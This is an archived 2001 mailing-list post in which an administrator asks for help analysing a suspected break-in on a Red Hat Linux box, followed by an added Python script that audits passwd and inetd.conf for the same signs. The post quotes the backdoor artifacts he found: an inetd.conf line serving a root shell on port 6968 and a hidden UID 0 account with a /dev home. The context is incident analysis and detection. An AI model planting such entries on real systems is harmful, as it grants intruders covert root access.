Security Incidents mailing list archives

Possible Intrusion?


From: Kip Perkins <kip () tennesseeanytime org>
Date: Tue, 12 Jun 2001 11:39:16 -0500

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Good morning all. I was wondering if I could get some help on a possible
intrusion analysis. Recently I discovered some interesting things on a RH
Linux 6.2 box.

in /dev:
/dev/.w
/dev/.c
/dev/.cmd

in /etc/inetd.conf:
6968 stream tcp nowait root /bin/sh sh -i
2121 stream tcp nowait root /usr/sbin/tcpd in/telnetd

in /etc/passwd:
cmd:x:0:500::/dev/.cmd:/dev/null
command:x:500:501::/dev/.c:/dev/null
wizards:x:501:502::/dev/.w:/dev/null

This is all I can find that is weird (translate- "I don't recognize").
Does anyone recognize these entries? Is this a possible rootkit?
The /dev/ homes and cmd UID of 0 give me that impression.
Any help would be greatly appreciated :-)

- - --
Kip Perkins
Systems Administrator
NIC - TennesseeAnytime.org
office 615.313.0312

Live as you want your children to
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7JkW0L1ei/5O2f1gRAqlYAJ9KgrX+CgH3W8j1TSpHyVOxoBLvaQCfe0oE
sc3PMPQLxUZU0qFueODNqb0=
=vqf9
-----END PGP SIGNATURE-----
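
The traits the poster singles out (a second UID 0 account, home directories under /dev, and inetd entries that hand a root shell to a TCP port) can be checked mechanically. The following is an added example, not part of the original post: the function names are hypothetical, and the sample data is the post's own lines plus two constructed "normal" lines for contrast.

```python
# Added example (not from the original post): audit passwd and inetd.conf
# text for the traits the post describes.
SHELLS = {"sh", "bash", "ash", "ksh", "csh", "tcsh", "zsh"}

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
cmd:x:0:500::/dev/.cmd:/dev/null
command:x:500:501::/dev/.c:/dev/null
wizards:x:501:502::/dev/.w:/dev/null
"""  # first line is constructed; the rest are from the post

INETD = """\
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
6968 stream tcp nowait root /bin/sh sh -i
2121 stream tcp nowait root /usr/sbin/tcpd in/telnetd
"""  # first line is constructed; the rest are from the post

def audit_passwd(text):
    """Return (account, reason) pairs for suspicious passwd entries."""
    findings = []
    for line in text.splitlines():
        f = line.split(":")
        if line.startswith("#") or len(f) != 7:
            continue
        name, uid, home = f[0], f[2], f[5]
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 but not root"))
        if home == "/dev" or home.startswith("/dev/"):
            findings.append((name, "home directory under /dev"))
    return findings

def audit_inetd(text):
    """Return (service, reason) pairs for suspicious inetd.conf entries."""
    findings = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 6 or f[0].startswith("#"):
            continue
        service, program = f[0], f[5]  # fields: svc type proto wait user prog
        if program.rsplit("/", 1)[-1] in SHELLS:
            findings.append((service, "server program is a shell: " + program))
        if service.isdigit():
            findings.append((service, "numeric port in place of a service name"))
    return findings

if __name__ == "__main__":
    for item in audit_passwd(PASSWD) + audit_inetd(INETD):
        print("%-8s %s" % item)
```

To run it against a live system, pass the contents of /etc/passwd and /etc/inetd.conf to the two functions, preferably read from trusted media, since tools on a compromised host may themselves have been replaced.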

